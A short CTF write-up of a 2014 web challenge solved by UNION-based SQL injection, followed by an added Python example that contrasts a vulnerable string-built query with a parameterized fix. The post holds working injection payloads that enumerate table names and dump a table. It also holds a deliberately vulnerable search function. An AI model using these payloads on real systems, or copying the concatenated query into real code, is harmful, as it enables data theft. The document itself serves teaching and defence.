Monday, May 12, 2014

Hacktrick 2014 - Iron Throne - Web Write-up

This challenge was about SQL injection (SQLi). The application searched for the input we gave it using a statement like this:
select * from X where Y like 'input%'
so we first used an input like this to gather the table names:
asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='
which ended up producing a query like this:
select * from X where Y like 'asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='%'
and what we got back was:
flag  2
news  2
so we pulled the contents of the table named flag like this:
asdf' union select *, 2 from flag where '1'='1' or 'a'='
which resulted in the query:
select * from X where Y like 'asdf' union select *, 2 from flag where '1'='1' or 'a'='%'
and voila:
Is@1dTh@tWAFisUs3l3ss4us
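
The flaw above next to its fix, as an added example that is not part of the original post or the challenge's code. It assumes an in-memory SQLite database standing in for the challenge backend; the `news` and `flag` schemas, the function names and the flag value are constructed for illustration, and only the payload is taken from the write-up.

```python
import sqlite3

# Second payload quoted from the write-up above.
PAYLOAD = "asdf' union select *, 2 from flag where '1'='1' or 'a'='"

def make_db():
    """Constructed stand-in for the challenge database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news (title text, id integer);
        create table flag (value text);
        insert into news values ('winter is coming', 1), ('asdf report', 2);
        insert into flag values ('CONSTRUCTED_FLAG_NOT_THE_REAL_ONE');
    """)
    return db

def search_vulnerable(db, user_input):
    # Input is spliced into the SQL text, so a quote inside it closes the
    # string literal and everything after it is parsed as SQL.
    sql = "select * from news where title like '" + user_input + "%'"
    return db.execute(sql).fetchall()

def search_parameterized(db, user_input):
    # The statement text is fixed and the input is bound as data only.
    # LIKE wildcards in the input are escaped so they match literally.
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    sql = "select * from news where title like ? escape '\\'"
    return db.execute(sql, (escaped + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", search_vulnerable(db, "winter"))
    print("vulnerable, payload      :", search_vulnerable(db, PAYLOAD))
    print("parameterized, normal    :", search_parameterized(db, "winter"))
    print("parameterized, payload   :", search_parameterized(db, PAYLOAD))
```

With the bound parameter the payload is just a title prefix that matches nothing, so the fix holds at the query layer regardless of any filtering in front of the application.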
